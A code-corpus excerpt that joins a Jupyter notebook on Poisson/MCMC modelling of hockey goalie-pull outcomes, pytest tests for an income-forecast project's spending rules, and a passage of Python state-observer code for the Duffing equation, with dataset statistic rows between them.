    """Evaluate the Poisson posterior curves over the final 5 minutes.

    Parameters
    ----------
    mu : sequence of 3 floats, optional
        Poisson means (in seconds) for goal_for, goal_against, no_goal.
        If None, only the time axis is returned.
    norm_factors : sequence of 3 floats, optional
        Class-probability weights applied to the respective curves.

    Returns
    -------
    ``(x,)`` if mu is None, otherwise ``(x, y_goal_for, y_goal_against,
    y_no_goal)``, where x is the game clock in minutes.
    """
    # Game clock in seconds over the window where goalie pulls occur
    x = np.arange(15*60, 20*60, 1)
    if mu is None:
        return (x / 60,)
    mu_goal_for = mu[0]
    mu_goal_against = mu[1]
    mu_no_goal = mu[2]
    y_goal_for = poisson.pmf(x, mu_goal_for)
    y_goal_against = poisson.pmf(x, mu_goal_against)
    y_no_goal = poisson.pmf(x, mu_no_goal)
    if norm_factors is not None:
        # Weight each curve by its class probability. Scale the arrays
        # already computed instead of re-evaluating the pmfs (the
        # original duplicated all three pmf calls here).
        y_goal_for = y_goal_for * norm_factors[0]
        y_goal_against = y_goal_against * norm_factors[1]
        y_no_goal = y_no_goal * norm_factors[2]
    # Convert into minutes
    x = x / 60
    return x, y_goal_for, y_goal_against, y_no_goal
ALPHA = 0.6
LW = 3
''' Plot MCMC samples '''
plt.hist(burned_trace['p_goal_for'] / 60, bins=50,
color='green', label='p_goal_for samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['p_goal_against'] / 60, bins=50,
color='red', label='p_goal_against samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['p_no_goal'] / 60, bins=50,
color='orange', label='p_no_goal samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
''' Plot poisson distributions '''
x, y_goal_for, y_goal_against, y_no_goal = poisson_posterior([
burned_trace['mu_goal_for'].mean(),
burned_trace['mu_goal_against'].mean(),
burned_trace['mu_no_goal'].mean(),
])
# Rescale
scale_frac = 0.7
y_goal_for = y_goal_for / y_goal_for.max() * scale_frac
y_goal_against = y_goal_against / y_goal_against.max() * scale_frac
y_no_goal = y_no_goal / y_no_goal.max() * scale_frac
plt.plot(x, y_goal_for, label=r'$P(\rm{goal\;for};\mu_{MCMC})$', color='green', lw=LW)
plt.plot(x, y_goal_against, label=r'$P(\rm{goal\;against};\mu_{MCMC})$', color='red', lw=LW)
plt.plot(x, y_no_goal, label=r'$P(\rm{no\;goal};\mu_{MCMC})$', color='orange', lw=LW)
''' Clean up the chart '''
plt.ylabel('Counts')
# plt.yticks([])
plt.xlabel('Time elapsed (3rd period)')
plt.legend()
savefig(plt, 'time_elapsed_poisson_mcmc_samples')
plt.show()
plt.plot(trace['mu_goal_for']/60, label='mu_goal_for', color='green')
plt.plot(trace['mu_goal_against']/60, label='mu_goal_against', color='red')
plt.plot(trace['mu_no_goal']/60, label='mu_no_goal', color='orange')
plt.ylabel('$\mu$ (minutes)')
plt.xlabel('MCMC step')
plt.axvline(N_burn, color='black', lw=2, label='Burn threshold')
plt.legend()
savefig(plt, 'time_elapsed_mu_steps')
plt.show()
ALPHA = 0.6
plt.hist(burned_trace['alpha']/60, bins=50,
color='b', label=r'$\alpha$',
histtype='stepfilled', alpha=ALPHA)
# plt.ylabel('MCMC counts')
# plt.xlabel('$\mu$ (minutes)')
plt.legend()
# savefig(plt, 'time_elapsed_mu_samples')
plt.show()
# This is not really working out...
# ---
#
# Determine $\alpha$ from the normalized poisson distributions
# Hard-coded MCMC results (class priors and Poisson means) so this
# cell can run without re-sampling.
# NOTE: assignment spelled "normalizing" to match the references below
# (the original assigned the misspelled ``model_normlizing_factors``
# and then read ``model_normalizing_factors`` — a NameError).
model_normalizing_factors = [
    0.1292882,
    0.26528024,
    0.62489297,
]
mu_mcmc = [
    1113.8279468130681,
    1120.1830172722719,
    1133.9420018554083
]
x, y_goal_for, y_goal_against, y_no_goal = poisson_posterior(
    mu_mcmc, norm_factors=model_normalizing_factors
)
# alpha(t) re-weights the three outcome curves so they sum to 1 at
# each time step: alpha = 1 / (P_for + P_against + P_no_goal)
alpha = np.power(
    np.sum([y_goal_for, y_goal_against, y_no_goal], axis=0),
    -1
)
plt.plot(x, alpha, label=r'$\alpha$', lw=LW)
plt.ylabel('Alpha re-weighting parameter')
# plt.yticks([])
plt.xlabel('Time elapsed (3rd period)')
plt.legend()
# savefig(plt, 'time_elapsed_poisson_cdf')
plt.show()
from scipy.stats import poisson
ALPHA = 0.6
LW = 3
''' Plot the poisson distributions '''
x, y_goal_for, y_goal_against, y_no_goal = poisson_posterior(
mu_mcmc, norm_factors=model_normalizing_factors
)
# Alpha has same shape as x, y above
alpha = np.power(
np.sum([y_goal_for, y_goal_against, y_no_goal], axis=0),
-1
)
y_goal_for = alpha * y_goal_for
y_goal_against = alpha * y_goal_against
y_no_goal = alpha * y_no_goal
plt.plot(x, y_goal_for, label=r'$\alpha \cdot P(\mathrm{goal\;for}\;|\;X)$', color='green', lw=LW)
plt.plot(x, y_goal_against, label=r'$\alpha \cdot P(\mathrm{goal\;against}\;|\;X)$', color='red', lw=LW)
plt.plot(x, y_no_goal, label=r'$\alpha \cdot P(\mathrm{no\;goal}\;|\;X)$', color='orange', lw=LW)
plt.ylabel('Chance of outcome at time $t$')
# plt.yticks([])
plt.xlabel('Time elapsed (3rd period)')
plt.legend()
savefig(plt, 'time_elapsed_outcome_chance_timeseries')
plt.show()
# Note how there are very few samples to draw conclusions from for the low and high times.
#
# e.g. less than 17
np.sum(training_samples[0] < 17*60) + np.sum(training_samples[1] < 17*60) + np.sum(training_samples[2] < 17*60)
# more than 17
np.sum(training_samples[0] > 17*60) + np.sum(training_samples[1] > 17*60) + np.sum(training_samples[2] > 17*60)
# Let's bring back $\mu$
plt.hist(burned_trace['mu_goal_for'])
plt.hist(burned_trace['mu_goal_against'])
plt.hist(burned_trace['mu_no_goal'])
# To get some idea of the uncertainty we need to figure out the uncertainty on $P$. We can do this using the knowledge of the uncertainty on $\mu$, as calculated with MCMC.
#
# $$
# \sigma_P = \big| \frac{\partial P}{\partial \mu} \big|\;\sigma_{\mu}
# $$
#
# where $\sigma_{\mu}$ is the error on mu. This error can be calculated from the MCMC samples
mu_mcmc_std = [
burned_trace['mu_goal_for'].std(),
burned_trace['mu_goal_against'].std(),
burned_trace['mu_no_goal'].std(),
]
mu_mcmc_std
# Now we need to evaluate the derivative:
# $$
# \frac{\partial P}{\partial \mu}
# $$
# Trying the analytic derivative
#
#
# $$
# \frac{\partial p}{\partial \mu} = \frac{e^{-\mu} (t - \mu) \cdot \mu^{t-1} }{t!}
# $$
#
# we can calculate $\sigma_p$ as done below
mu_mcmc
mu_mcmc_std
model_normalizing_factors
x = poisson_posterior()[0]
x[:10]
from scipy.special import factorial
def poisson_derivative(mu, t):
    """Analytic d/dmu of the Poisson pmf: exp(-mu) * (t - mu) * mu**(t-1) / t!.

    Uses an exact (integer) factorial, which overflows gracefully but is
    slow/awkward for large t.
    """
    pmf_like_term = np.power(mu, (t-1)) / factorial(t, exact=True)
    return np.exp(-mu) * (t - mu) * pmf_like_term
# Probe the analytic derivative at t ~= mu for the 'goal for' model.
mu = mu_mcmc[0]
poisson_derivative(mu, t=int(mu))
# Ahhh! These factorials are not nice
from scipy.special import factorial
def poisson_derivative(mu, t):
    """Analytic d/dmu of the Poisson pmf: exp(-mu) * (t - mu) * mu**(t-1) / t!.

    Float (gamma-function based) factorial; faster than the exact version but
    overflows to inf for large t.
    """
    numerator = np.exp(-mu) * (t - mu) * np.power(mu, (t-1))
    return numerator / factorial(t)
def calc_posteror_error(mu, mu_std, norm_fac):
    """Propagate the MCMC uncertainty on mu into an error on P.

    Implements sigma_P = |dP/dmu| * sigma_mu, scaled by the model's
    normalization factor, evaluated at each (integer) second of the period.
    """
    # poisson_posterior returns times in minutes; convert to seconds.
    times_sec = poisson_posterior()[0] * 60
    derivs = [
        norm_fac * poisson_derivative(mu, int(t))
        for t in tqdm_notebook(times_sec)
    ]
    return mu_std * np.array(derivs)
# Propagate mu uncertainty through the analytic derivative for each model.
err_p_goal_for = calc_posteror_error(mu_mcmc[0], mu_mcmc_std[0], model_normalizing_factors[0])
err_p_goal_against = calc_posteror_error(mu_mcmc[1], mu_mcmc_std[1], model_normalizing_factors[1])
err_p_no_goal = calc_posteror_error(mu_mcmc[2], mu_mcmc_std[2], model_normalizing_factors[2])
err_p_goal_for
# I think the factorial is causing issues
# plt.hist(err_p_goal_for, bins=100)
# Assuming the error is randonly distributed and calculating 95% confidence intervals ($\pm$1.96$\sigma$)...
from scipy.stats import poisson
ALPHA = 0.6
ALPHA_LIGHT = 0.3
LW = 3
ERR_BAR_CUTOFF = 0
''' Plot the poisson distributions '''
x, y_goal_for, y_goal_against, y_no_goal = poisson_posterior(
    mu_mcmc, norm_factors=model_normalizing_factors
)
# Alpha has same shape as x, y above
alpha = np.power(
    np.sum([y_goal_for, y_goal_against, y_no_goal], axis=0),
    -1
)
y_goal_for = alpha * y_goal_for
# y_goal_against = alpha * y_goal_against
# y_no_goal = alpha * y_no_goal
plt.plot(x, y_goal_for, label=r'$\alpha \cdot P(\mathrm{goal\;for}\;|\;X)$', color='green', lw=LW)
# plt.plot(x, y_goal_against, label=r'$\alpha \cdot P(\mathrm{goal\;against}\;|\;X)$', color='red', lw=LW)
# plt.plot(x, y_no_goal, label=r'$\alpha \cdot P(\mathrm{no\;goal}\;|\;X)$', color='orange', lw=LW)
plt.plot(x[ERR_BAR_CUTOFF:],
         (alpha*(err_p_goal_for + err_p_goal_for*1.96))[ERR_BAR_CUTOFF:],
         label='goal for 95% CI', color='green', alpha=ALPHA_LIGHT)
# FIX: the lower band previously referenced the undefined name
# `err_p_foal_for` (typo), which raised NameError when this cell ran.
plt.plot(x[ERR_BAR_CUTOFF:],
         (alpha*(err_p_goal_for - err_p_goal_for*1.96))[ERR_BAR_CUTOFF:],
         label='goal for 95% CI', color='green', alpha=ALPHA_LIGHT)
plt.ylabel('Chance of outcome at time $t$')
# plt.yticks([])
plt.xlabel('Time elapsed (3rd period)')
plt.legend()
# savefig(plt, 'time_elapsed_outcome_chance_timeseries')
plt.show()
# ^ Ignore
# Let's take the numerical derivative instead
import inspect
print(inspect.getsource(poisson_posterior))
from scipy.misc import derivative
from tqdm import tqdm_notebook
def calc_posteror_error(mu, mu_std, mu_step=1e-6):
    """Propagate MCMC uncertainty on mu into an error on P numerically.

    Same sigma_P = |dP/dmu| * sigma_mu propagation as the analytic version
    above, but dP/dmu is taken as a central finite difference of the Poisson
    pmf (step `mu_step`), avoiding explicit factorials.

    NOTE(review): relies on `scipy.misc.derivative`, which has been removed
    from modern SciPy — confirm the pinned SciPy version still ships it.
    """
    x = poisson_posterior()[0] * 60  # convert back into seconds (discrete)
    err = mu_std * np.abs(np.array([
        derivative(lambda _mu: poisson.pmf(int(t), _mu), mu, dx=mu_step)
        for t in tqdm_notebook(x)
    ]))
    return err
# Numerical error propagation for the 'goal for' model, then visual checks.
err_p_goal_for = calc_posteror_error(mu_mcmc[0], mu_mcmc_std[0])
err_p_goal_for
x = poisson_posterior()[0] * 60
plt.plot(x, err_p_goal_for)
ALPHA = 0.6
ALPHA_LIGHT = 0.3
LW = 3
''' Poisson distributions '''
# NOTE(review): `normlizing_factors` below is spelled differently from the
# `model_normalizing_factors` used elsewhere in this notebook — confirm it is
# defined in an earlier cell, otherwise this cell raises NameError.
x, y_goal_for, y_goal_against, y_no_goal = poisson_posterior(mu_mcmc, norm_factors=normlizing_factors)
''' Errors '''
err_goal_for = calc_posteror_error(mu_mcmc[0], mu_mcmc_std[0]) * normlizing_factors[0]
err_bar_top = y_goal_for + err_goal_for
err_bar_bottom = y_goal_for - err_goal_for
''' Plot '''
# plt.plot(x, y_goal_for, label=r'$P(\rm{goal\;for};\mu_{MCMC})$', color='green', lw=LW)
# plt.fill_between(err_bar_bottom, err_bar_top, alpha=ALPHA_LIGHT, color='green')
plt.plot(x, err_goal_for)
plt.plot(x, err_bar_top)
plt.plot(x, err_bar_bottom)
''' Clean up the chart '''
plt.ylabel('Counts')
# plt.yticks([])
plt.xlabel('Time elapsed (3rd period)')
plt.legend()
# savefig(plt, 'time_elapsed_poisson_mcmc_samples')
plt.show()
# Same data again, but drawn as a shaded error band instead of three lines.
ALPHA = 0.6
ALPHA_LIGHT = 0.3
LW = 3
''' Poisson distributions '''
x, y_goal_for, y_goal_against, y_no_goal = poisson_posterior(mu_mcmc, norm_factors=normlizing_factors)
''' Errors '''
err_goal_for = calc_posteror_error(mu_mcmc[0], mu_mcmc_std[0]) * normlizing_factors[0]
err_bar_top = y_goal_for + err_goal_for
err_bar_bottom = y_goal_for - err_goal_for
''' Plot '''
# plt.plot(x, y_goal_for, label=r'$P(\rm{goal\;for};\mu_{MCMC})$', color='green', lw=LW)
plt.fill_between(x, err_bar_bottom, err_bar_top, alpha=ALPHA_LIGHT, color='green')
# plt.plot(x, err_goal_for)
# plt.plot(x, err_bar_top)
# plt.plot(x, err_bar_bottom)
''' Clean up the chart '''
plt.ylabel('Counts')
# plt.yticks([])
plt.xlabel('Time elapsed (3rd period)')
plt.legend()
# savefig(plt, 'time_elapsed_poisson_mcmc_samples')
plt.show()
# So that's the error estimate as derived from uncertainty in $\mu$! Pretty cool.
#
# Now we can do $\sigma_\alpha = \alpha \cdot \sigma_P$
from scipy.stats import poisson
ALPHA = 0.6
ALPHA_LIGHT = 0.3
LW = 3
''' Plot the poisson distributions '''
x, y_goal_for, y_goal_against, y_no_goal = poisson_posterior(
    mu_mcmc, norm_factors=model_normalizing_factors
)
# Alpha has same shape as x, y above
alpha = np.power(
    np.sum([y_goal_for, y_goal_against, y_no_goal], axis=0),
    -1
)
y_goal_for = alpha * y_goal_for
y_goal_against = alpha * y_goal_against
y_no_goal = alpha * y_no_goal
plt.plot(x, y_goal_for, label=r'$\alpha \cdot P(\mathrm{goal\;for}\;|\;X)$', color='green', lw=LW)
plt.plot(x, y_goal_against, label=r'$\alpha \cdot P(\mathrm{goal\;against}\;|\;X)$', color='red', lw=LW)
plt.plot(x, y_no_goal, label=r'$\alpha \cdot P(\mathrm{no\;goal}\;|\;X)$', color='orange', lw=LW)
''' Plot the errors '''
# Scale each propagated error by the same alpha normalization as the curves.
err_p_goal_for = alpha * calc_posteror_error(mu_mcmc[0], mu_mcmc_std[0])
err_p_goal_against = alpha * calc_posteror_error(mu_mcmc[1], mu_mcmc_std[1])
err_p_no_goal = alpha * calc_posteror_error(mu_mcmc[2], mu_mcmc_std[2])
plt.fill_between(x, y_goal_for-err_p_goal_for, y_goal_for+err_p_goal_for,
                 color='green', alpha=ALPHA_LIGHT)
plt.fill_between(x, y_goal_against-err_p_goal_against, y_goal_against+err_p_goal_against,
                 color='red', alpha=ALPHA_LIGHT)
plt.fill_between(x, y_no_goal-err_p_no_goal, y_no_goal+err_p_no_goal,
                 color='orange', alpha=ALPHA_LIGHT)
plt.ylabel('Chance of outcome at time $t$')
# plt.yticks([])
plt.xlabel('Time elapsed (3rd period)')
plt.legend()
# savefig(plt, 'time_elapsed_outcome_chance_timeseries')
plt.show()
# We can't say anything conclusive due to huge errors on low times, but we are much more confident on late game predictions
# Same chart, zoomed to the final minutes (x in minutes, y clipped to [0, 1]).
from scipy.stats import poisson
ALPHA = 0.6
ALPHA_LIGHT = 0.3
LW = 3
''' Plot the poisson distributions '''
x, y_goal_for, y_goal_against, y_no_goal = poisson_posterior(
    mu_mcmc, norm_factors=model_normalizing_factors
)
# Alpha has same shape as x, y above
alpha = np.power(
    np.sum([y_goal_for, y_goal_against, y_no_goal], axis=0),
    -1
)
y_goal_for = alpha * y_goal_for
y_goal_against = alpha * y_goal_against
y_no_goal = alpha * y_no_goal
plt.plot(x, y_goal_for, label=r'$\alpha \cdot P(\mathrm{goal\;for}\;|\;X)$', color='green', lw=LW)
plt.plot(x, y_goal_against, label=r'$\alpha \cdot P(\mathrm{goal\;against}\;|\;X)$', color='red', lw=LW)
plt.plot(x, y_no_goal, label=r'$\alpha \cdot P(\mathrm{no\;goal}\;|\;X)$', color='orange', lw=LW)
''' Plot the errors '''
err_p_goal_for = alpha * calc_posteror_error(mu_mcmc[0], mu_mcmc_std[0])
err_p_goal_against = alpha * calc_posteror_error(mu_mcmc[1], mu_mcmc_std[1])
err_p_no_goal = alpha * calc_posteror_error(mu_mcmc[2], mu_mcmc_std[2])
plt.fill_between(x, y_goal_for-err_p_goal_for, y_goal_for+err_p_goal_for,
                 color='green', alpha=ALPHA_LIGHT)
plt.fill_between(x, y_goal_against-err_p_goal_against, y_goal_against+err_p_goal_against,
                 color='red', alpha=ALPHA_LIGHT)
plt.fill_between(x, y_no_goal-err_p_no_goal, y_no_goal+err_p_no_goal,
                 color='orange', alpha=ALPHA_LIGHT)
plt.ylabel('Chance of outcome at time $t$')
# plt.yticks([])
plt.xlabel('Time elapsed (3rd period)')
plt.xlim(17, 20)
plt.ylim(0, 1)
plt.legend()
# savefig(plt, 'time_elapsed_outcome_chance_timeseries')
plt.show()
from IPython.display import HTML
HTML('<style>div.text_cell_render{font-size:130%;padding-top:50px;padding-bottom:50px}</style>')
| 28.868236
| 412
| 0.66356
| 8,990
| 57,621
| 4.018354
| 0.07564
| 0.062394
| 0.023917
| 0.023917
| 0.776111
| 0.749398
| 0.734478
| 0.721522
| 0.713661
| 0.704526
| 0
| 0.025408
| 0.187189
| 57,621
| 1,995
| 413
| 28.882707
| 0.745917
| 0.257215
| 0
| 0.734104
| 0
| 0.001927
| 0.172625
| 0.032823
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.031792
| null | null | 0.014451
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
56f4bfc4cc61d78dd2c0a590d62107f1f27e2d54
| 33
|
py
|
Python
|
src/error_analysis.py
|
exue026/spam-detection-model
|
1a8afc4b4403ef49d8ebbdb5fbcb56c643996b1d
|
[
"MIT"
] | null | null | null |
src/error_analysis.py
|
exue026/spam-detection-model
|
1a8afc4b4403ef49d8ebbdb5fbcb56c643996b1d
|
[
"MIT"
] | null | null | null |
src/error_analysis.py
|
exue026/spam-detection-model
|
1a8afc4b4403ef49d8ebbdb5fbcb56c643996b1d
|
[
"MIT"
] | null | null | null |
def analyze_error():
    """Placeholder error-analysis entry point; currently always returns 0."""
    result = 0
    return result
| 16.5
| 20
| 0.69697
| 5
| 33
| 4.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.038462
| 0.212121
| 33
| 2
| 21
| 16.5
| 0.807692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
712c62ad55677b24a65bfa64e5786ad4b35a9859
| 2,070
|
py
|
Python
|
tests/test_spending_rules.py
|
davidjohnoliver/IncomeForecast
|
f638a16a3bccb576f7977f9ea3fc08047c96ecce
|
[
"MIT"
] | null | null | null |
tests/test_spending_rules.py
|
davidjohnoliver/IncomeForecast
|
f638a16a3bccb576f7977f9ea3fc08047c96ecce
|
[
"MIT"
] | null | null | null |
tests/test_spending_rules.py
|
davidjohnoliver/IncomeForecast
|
f638a16a3bccb576f7977f9ea3fc08047c96ecce
|
[
"MIT"
] | null | null | null |
import spending_rules
import model
import math
def standard_previous_deltas():
    """Shared test fixture: a deltas_state anchored at the baseline year 1999."""
    baseline_year = 1999
    return model.deltas_state.from_year(baseline_year)
def standard_previous_funds():
    """Shared test fixture: a funds_state with both balances zeroed, year 1999."""
    baseline_year = 1999
    return model.funds_state(0, 0, baseline_year)
def test_get_luxury_over_basic():
    """get_luxury_over_basic(20000, 0.05) applied to 50000 spending -> 51500."""
    spend_rule = spending_rules.get_luxury_over_basic(20000, 0.05)
    previous_deltas = standard_previous_deltas().update_spending(50000)
    updated = model.get_updated_deltas_from_rules(
        standard_previous_funds(), previous_deltas, [spend_rule])
    assert 51500 == updated.spending
def test_get_luxury_over_basic_capped_below():
    """Below the 0.9 salary cap (salary 100000) the capped rule matches the
    uncapped result: 50000 spending -> 51500."""
    spend_rule = spending_rules.get_luxury_over_basic_capped(20000, 0.05, 0.9)

    def set_salary(deltas: model.deltas_state, previous_funds: model.funds_state, previous_deltas: model.deltas_state):
        # Rule that pins gross salary high enough that the cap does not bind.
        return deltas.update_gross_salary(100000)

    previous_deltas = standard_previous_deltas().update_spending(50000)
    updated = model.get_updated_deltas_from_rules(
        standard_previous_funds(), previous_deltas, [set_salary, spend_rule])
    assert 51500 == updated.spending
def test_get_luxury_over_basic_capped_above():
    """With salary 55800 the 0.9 cap binds and spending is limited to 50220."""
    spend_rule = spending_rules.get_luxury_over_basic_capped(20000, 0.05, 0.9)

    def set_salary(deltas: model.deltas_state, previous_funds: model.funds_state, previous_deltas: model.deltas_state):
        # Rule that pins gross salary low enough to trigger the cap.
        return deltas.update_gross_salary(55800)

    previous_deltas = standard_previous_deltas().update_spending(50000)
    updated = model.get_updated_deltas_from_rules(
        standard_previous_funds(), previous_deltas, [set_salary, spend_rule])
    assert 50220 == updated.spending
def test_get_maxed_or_zeroed_out():
    """Spot-check get_maxed_or_zeroed_out across the plateau, the end points,
    and the midpoint of the 0.1-wide end regions."""
    end_region = 0.1
    c_m = 0.3
    # Plateau: inputs away from the ends return c_m unchanged.
    assert c_m == spending_rules.get_maxed_or_zeroed_out(0.5, c_m, end_region)
    assert c_m == spending_rules.get_maxed_or_zeroed_out(0.1, c_m, end_region)
    assert math.isclose(c_m, spending_rules.get_maxed_or_zeroed_out(0.9, c_m, end_region))
    # End points map to the extremes.
    assert 0 == spending_rules.get_maxed_or_zeroed_out(0, c_m, end_region)
    assert 1 == spending_rules.get_maxed_or_zeroed_out(1, c_m, end_region)
    # Midpoint of the lower end region interpolates to c_m / 2.
    # (The original file asserted this twice verbatim; once is sufficient.)
    assert c_m / 2 == spending_rules.get_maxed_or_zeroed_out(0.05, c_m, end_region)
| 51.75
| 149
| 0.786957
| 333
| 2,070
| 4.441441
| 0.162162
| 0.017579
| 0.108181
| 0.086545
| 0.855308
| 0.821501
| 0.774172
| 0.721433
| 0.699121
| 0.699121
| 0
| 0.055373
| 0.118841
| 2,070
| 40
| 150
| 51.75
| 0.755482
| 0
| 0
| 0.30303
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.30303
| 1
| 0.242424
| false
| 0
| 0.090909
| 0.121212
| 0.454545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
71388b3a756ae644ef76b02ab16b59d8cb0ce9bb
| 40,172
|
py
|
Python
|
observers.py
|
Data-Science-in-Mechanical-Engineering/joint_state_dynamics_estimation_HGOs_GPs
|
5980ad4ec1e94c4a2eeb5829b27effee5e069370
|
[
"MIT"
] | null | null | null |
observers.py
|
Data-Science-in-Mechanical-Engineering/joint_state_dynamics_estimation_HGOs_GPs
|
5980ad4ec1e94c4a2eeb5829b27effee5e069370
|
[
"MIT"
] | null | null | null |
observers.py
|
Data-Science-in-Mechanical-Engineering/joint_state_dynamics_estimation_HGOs_GPs
|
5980ad4ec1e94c4a2eeb5829b27effee5e069370
|
[
"MIT"
] | 4
|
2021-02-17T05:14:11.000Z
|
2021-03-08T14:00:18.000Z
|
import logging
import numpy as np
from scipy.integrate import solve_ivp
from utils import reshape_pt1, reshape_pt1_tonormal, reshape_dim1
# Possible observers (dynamics functions f(x_estim, u)) and functions to
# produce measured data from true data
# Input x, u, version and parameters, output x at the next step (dt
# later) with scipy ODE solver
def dynamics_traj_observer(x0, u, y, t0, dt, init_control, discrete=False,
                           version=None, method='RK45', t_span=None,
                           t_eval=None, GP=None, **kwargs):
    """Simulate the observer dynamics `version` starting from x0.

    Either iterates `version` as a discrete map sampled every `dt`
    (discrete=True), or integrates it as an ODE with scipy's solve_ivp.
    `u` and `y` are the control and measurement callables handed through to
    `version`; `GP` and `**kwargs` are forwarded untouched.
    Returns the trajectory as a reshape_pt1 array, one row per entry of
    t_eval (continuous case) or per discrete step.
    """
    # Avoid mutable default arguments: the original [0, 1] / [0.1] lists were
    # shared across calls; recreate them per call instead.
    if t_span is None:
        t_span = [0, 1]
    if t_eval is None:
        t_eval = [0.1]
    if discrete:
        xtraj = np.zeros((len(t_eval), x0.shape[1]))
        xtraj[0] = reshape_pt1(x0)
        t = t0
        i = 0
        while (i < len(t_eval) - 1) and (t < t_eval[-1]):
            i += 1
            # FIX: step from the previously computed state xtraj[i - 1].
            # The original read xtraj[-1], i.e. the still-zero last row of the
            # preallocated buffer, so every step started from zeros.
            xnext = reshape_pt1(
                version(t, xtraj[i - 1], u, y, t0, init_control, GP,
                        **kwargs))
            xtraj[i] = xnext
            t += dt
    else:
        sol = solve_ivp(
            lambda t, x: version(t, x, u, y, t0, init_control, GP, **kwargs),
            t_span=t_span, y0=reshape_pt1_tonormal(x0), method=method,
            t_eval=t_eval)
        xtraj = reshape_pt1(sol.y.T)
    return reshape_pt1(xtraj)
# Observer for the continuous time Duffing equation
# Source: Observer design for the duffing equation using Gersgorin’s theorem,
# by Alberto Delgado
def duffing_observer_Delgado(t, xhat, u, y, t0, init_control, GP, kwargs):
    """Continuous-time Luenberger-style observer for the Duffing equation.

    Returns xhatdot for state estimate xhat given measurement y(t) and
    control u(t). Gains l1, l2 depend on the Duffing parameters alpha, beta,
    delta read from kwargs. `GP` is unused here (kept for a uniform observer
    signature). Source: "Observer design for the duffing equation using
    Gersgorin's theorem", Alberto Delgado.
    """
    alpha = kwargs.get('alpha')
    beta = kwargs.get('beta')
    delta = kwargs.get('delta')
    xhat = reshape_pt1(xhat)
    # y and u are callables; evaluate them at the current time.
    y = reshape_pt1(y(t, kwargs))
    u = reshape_pt1(u(t, kwargs, t0, init_control))
    # My gains
    l1 = delta - 5
    l2 = alpha - delta ** 2 + 3 * beta * xhat[:, 0] ** 2
    # # Delgado gains
    # l1 = - 5
    # l2 = - (alpha + 3 * xhat[:, 0] ** 2)
    # Linear part A, nonlinear part F, output-injection correction LC.
    A = reshape_pt1([[0, 1], [-alpha, -delta]])
    F1 = reshape_dim1(np.zeros_like(xhat[:, 0]))
    F2 = reshape_dim1(- beta * xhat[:, 0] ** 3)
    F = reshape_pt1(np.concatenate((F1, F2), axis=1))
    LC = reshape_pt1([[l1 * (xhat[:, 0] - y), l2 * (xhat[:, 0] - y)]])
    xhatdot = reshape_pt1(np.dot(A, reshape_pt1_tonormal(xhat)) + F + LC + u)
    return xhatdot
# Observer for the discrete time Duffing map
# Source: Observer design for the duffing equation using Gersgorin’s theorem,
# by Alberto Delgado
def duffing_observer_Delgado_discrete(t, xhat, u, y, t0, init_control, GP,
                                      kwargs):
    """Discrete-time variant of duffing_observer_Delgado (Duffing map).

    Same structure as the continuous observer, but constant gains
    (l1 = l2 = -0.1) and the returned value is the next state xhatnext
    rather than a derivative. `GP` is unused (uniform signature).
    """
    alpha = kwargs.get('alpha')
    beta = kwargs.get('beta')
    delta = kwargs.get('delta')
    xhat = reshape_pt1(xhat)
    # y and u are callables; evaluate them at the current time.
    y = reshape_pt1(y(t, kwargs))
    u = reshape_pt1(u(t, kwargs, t0, init_control))
    # My gains
    l1 = -0.1
    l2 = -0.1
    # # Delgado gains
    # l1 = - 5
    # l2 = - (alpha + 3 * xhat[:, 0] ** 2)
    A = reshape_pt1([[0, 1], [-alpha, -delta]])
    F1 = reshape_dim1(np.zeros_like(xhat[:, 0]))
    F2 = reshape_dim1(- beta * xhat[:, 0] ** 3)
    F = reshape_pt1(np.concatenate((F1, F2), axis=1))
    LC = reshape_pt1([[l1 * (xhat[:, 0] - y), l2 * (xhat[:, 0] - y)]])
    xhatnext = reshape_pt1(np.dot(A, reshape_pt1_tonormal(xhat)) + F + LC + u)
    return xhatnext
# Observer for the continuous time Duffing equation
# Using current GP estimation of dynamics for xhat_t+1, + the Delgado gains (
# artificially well chosen for now since form chosen by knowing the
# dynamics...) * (xhat_t - y_t)
def duffing_observer_Delgado_GP(t, xhat, u, y, t0, init_control, GP, kwargs):
    """Continuous-time Duffing observer with GP-estimated dynamics.

    The model-based A x + F term of duffing_observer_Delgado is replaced by
    the GP's prediction of the dynamics; only the output-injection term LC
    (Delgado-style gains) is kept. `GP` may be a GP object (detected via its
    class name, uses .predict) or a plain callable prior; if falsy, the
    dynamics estimate is zero.
    """
    alpha = kwargs.get('alpha')
    beta = kwargs.get('beta')
    delta = kwargs.get('delta')
    xhat = reshape_pt1(xhat)
    # y and u are callables; evaluate them at the current time.
    y = reshape_pt1(y(t, kwargs))
    u = reshape_pt1(u(t, kwargs, t0, init_control))
    # My gains
    l1 = delta - 5
    l2 = alpha - delta ** 2 + 3 * beta * xhat[:, 0] ** 2
    # # Delgado gains
    # l1 = - 5
    # l2 = - (alpha + 3 * xhat[:, 0] ** 2)
    if GP:
        if 'GP' in GP.__class__.__name__:
            mean, var, lowconf, uppconf = GP.predict(reshape_pt1(xhat),
